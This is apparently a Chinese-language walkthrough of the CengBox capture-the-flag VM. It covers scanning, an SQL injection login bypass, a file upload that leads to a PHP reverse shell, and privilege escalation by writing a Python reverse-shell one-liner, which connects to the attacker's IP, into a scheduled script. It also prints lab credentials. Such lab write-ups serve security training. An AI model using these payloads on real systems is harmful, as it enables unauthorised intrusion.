打靶-CengBox

前言

kali IP:192.168.131.28

靶机IP:192.168.131.243

Difficulty : beginner/intermediate

渗透过程

plaintext
1
arp-scan-l

image-20240811164148941

plaintext
1
nmap -sV 192.168.131.243 -A

image-20240811165002855

就22和80,看来这个靶机难度不是很高

先扫扫目录

plaintext
1
dirb http://192.168.131.243  /usr/share/wordlists/dirb/big.txt

image-20240811170408552

扫到了masteradmin

继续扫一下masteradmin

plaintext
1
dirb http://192.168.131.243 -X .php

image-20240811173347788

扫描到3个,db.php访问为空,访问upliads.php会跳转到login.php

页面存在sql注入,万能密码可登录

plaintext
1
admin'or 1=1#

登陆成功,进入文件上传,但没有反应

回去前面的sql注入

sqlmap抛出admin密码

image-20240811174852047

plaintext
1
masteradmin/C3ng0v3R00T1!

出题人好阴险,登上admin上传文件还是没反应,我以为有问题

查看源码才发现不对劲image-20240811182448026

在左上角黑色字体藏着

image-20240811182521065extension not allowed, please choose a CENG file.

是ceng文件尾才行,改个后缀就行

结合前面扫路径有uploads,猜测路径为uploads/1.ceng,成功

链接蚁剑,

db.php

plaintext
1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
$serverName = "localhost";
$username = "root";
$password = "SuperS3cR3TPassw0rd1!";
$dbName = "cengbox";
//Create Connection
$conn = new mysqli($serverName, $username, $password,$dbName);

//Check Connection
if($conn->connect_error){
die("Connection Failed: ".$conn->connect_error);
} else { }
?>

拿到数据库密码,尝试链接数据库命令行和蚁剑都连不上,

后面尝试反弹shell不行,直接上脚本php-reverse-shell.php

拿到反弹shell,

plaintext
1
2
python3 -c "import pty;pty.spawn('/bin/bash')"
find / -perm -u=s -exec ls -al {} \; 2> /dev/null

image-20240811183936972

没发现啥可疑的

上pspy64s

plaintext
1
2
3
4
 systemctl start nginx
wget http://192.168.131.28/pspy64s
chmod 777 pspy64s
./pspy64s

image-20240811184215669

这个比较可疑,还有写权限(惊喜)

image-20240811184554937

好吧,写权限不是我的,我想echo,发现没权限

在home文件夹下,发现用户cengover,尝试切换

密码为前面拿到的

C3ng0v3R00T1!

切换成,这个应该有权限了

plaintext
1
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.131.28",888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")' > md5check.py

image-20240811185629734

写入成功,稍等一会,来了

image-20240811185718074

总结

这个靶机所用到的工具,前2个靶场都用到过,做起来就舒服多了,不过成成还是不熟练,拿到www-data的权限之后,进行搜集,要注重分析有无用户,如需提权,要查找能够有利用的高权限文件